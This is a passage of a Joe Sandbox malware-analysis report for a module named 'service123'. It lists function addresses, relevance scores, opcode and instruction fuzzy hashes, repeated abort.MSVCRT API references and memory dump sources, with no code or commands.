Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction ID: 74055106bd5c85bbec3f8eed1e7cce8683fb591d7d863622b8914b55e9ba2b85
Opcode Fuzzy Hash: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction Fuzzy Hash: 5DC012719455044BCF40EF34C0C00B8F7F1AF42288F125468C4C4E7700E771E845CB86

Function 6C2DD674 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction ID: 7025aececa00cac64f3b8e4a4951205ec55d2fd8604582e84d5cb4d12627c7dc
Opcode Fuzzy Hash: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction Fuzzy Hash: 84C0C9718455044BCF80EF3480800B8B3E1AB42288F125868D484A7740E730E8468A86

Function 6C2DD7F4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction ID: 2bc49ff55e53e2499c991d49cff08a7bd6a3c24ca6e5fc578ce5fcb0c9b4cc67
Opcode Fuzzy Hash: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction Fuzzy Hash: 7CC01271C455084BCF40EF38C0C05B8F3F0AB42288F521468C484E7700E730E886CB46

Function 6C2CB1D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: 1f2a59c8eda9cad1ae52951a63a4e05319d3206eccd7bb67852071755b5c1d18
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: 0FC012B0C062408AC200BF38810A228BAB07B42208F8428ACD48017B41E739C01C8A6B

Function 6C2B28FA Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 6C386CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Strings

L:9l, xrefs: 6C2B2929

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID: L:9l
API String ID: 4206212132-1603868800
Opcode ID: 337479cf2217122288d8b7d3caab718d56ef61fe3b506c7b9f1f3fe98dc86ba7
Instruction ID: d4d59efbdf69774429c3740ec53a638ff8b72df0a4044b199c6046ee2afad859
Opcode Fuzzy Hash: 337479cf2217122288d8b7d3caab718d56ef61fe3b506c7b9f1f3fe98dc86ba7
Instruction Fuzzy Hash: A811C2B2602201CBE748FF18E891F55B7B0FB11309F009B58D584D7A11D738E818CFA1

Function 6C2B2A2F Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C386CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Strings

V:9l, xrefs: 6C2B2A5E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID: V:9l
API String ID: 4206212132-1976145827
Opcode ID: fa4a29f319f1549fa2adf7d07ea7588500ed3c5f670e48d2aa79820d41d921ee
Instruction ID: 173466e08db8e05c143d80869f32bcb30aa761846cdb9cd2b8e083fd615a8e58
Opcode Fuzzy Hash: fa4a29f319f1549fa2adf7d07ea7588500ed3c5f670e48d2aa79820d41d921ee
Instruction Fuzzy Hash: 3411D0B2612201CBE748FF28E891F55B7B0FB11309F009A58D584DBA11D738E818CFA1

Function 6C2B29B1 Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C386CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Strings

`:9l, xrefs: 6C2B29E0

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID: `:9l
API String ID: 4206212132-3265366847
Opcode ID: e115a090533309b7b3203a475e2e0274351c4895ecdf7430a54737f71b41a693
Instruction ID: fb15754517280beee4d154bdc22ed6053ae92f1166ff128fe8fb8f22a953a7b7
Opcode Fuzzy Hash: e115a090533309b7b3203a475e2e0274351c4895ecdf7430a54737f71b41a693
Instruction Fuzzy Hash: 88F067B2602201CBD744EF18D494B6AB7B0FF0234CF009A48C854ABB06E735E428CF96

Function 6C2BBAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Strings

@, xrefs: 6C2BBAB1

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 2f064edf4aa5331c09a4fecf69d393f5a096f6e6f2db4a580b39a7f4ab2b4600
Instruction ID: ceebffda4ccf54cc7aab1f97558e86225c4d8e6c0bbb063ede8c0135ddb2006c
Opcode Fuzzy Hash: 2f064edf4aa5331c09a4fecf69d393f5a096f6e6f2db4a580b39a7f4ab2b4600
Instruction Fuzzy Hash: 67B1443261931E8FC710CE2DC4D0755B7E2AB8539CF49896EED95A7B85D335E808CB81

Function 6C2B2290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee2009be8f22c3aea3b1e0d593ba01b96b0056bd87482b6a9a5af44f9bb8a92
Instruction ID: 542042402af3ce349dc5c76f2ff7d125571361e07f5b3d32b1e2fb170fe68e24
Opcode Fuzzy Hash: bee2009be8f22c3aea3b1e0d593ba01b96b0056bd87482b6a9a5af44f9bb8a92
Instruction Fuzzy Hash: 17C1C0B16043058FD704CF29C48475AB7E2AF4538CF149969DC98EFB45E739E94ACBA0

Function 6C2BB7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e206c00f268ea3820d9b6de589f0180a4ab2cf44763543ddad60681c16e8c3d7
Instruction ID: 1bea1f4daefb5f95cc48904609737949b31960f109bb0eab396104c59137e49c
Opcode Fuzzy Hash: e206c00f268ea3820d9b6de589f0180a4ab2cf44763543ddad60681c16e8c3d7
Instruction Fuzzy Hash: C741E47660934A9FD710DE29C0C071A7BF4AF4635CF18899DED956BB52C331E845CB41

Function 6C2B29F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C386CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386D44
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D4C
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D51
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D56
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D5B
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 077704bb78dfabc02f1b4ed10b452e1ec7981bbb0968e5763ddf9395cceb7a5b
Instruction ID: 0959ab2a7a077749e09ff48b5d5d10d2f1711e97bbd96bcd6e7332f423fe5545
Opcode Fuzzy Hash: 077704bb78dfabc02f1b4ed10b452e1ec7981bbb0968e5763ddf9395cceb7a5b
Instruction Fuzzy Hash: 8F0116B2612201CBE744FF28D891B55B7B0FB11309F009A58D584DBA11D738E428CF91

Function 6C2B28BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C386CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2BC5DB), ref: 6C386CF9
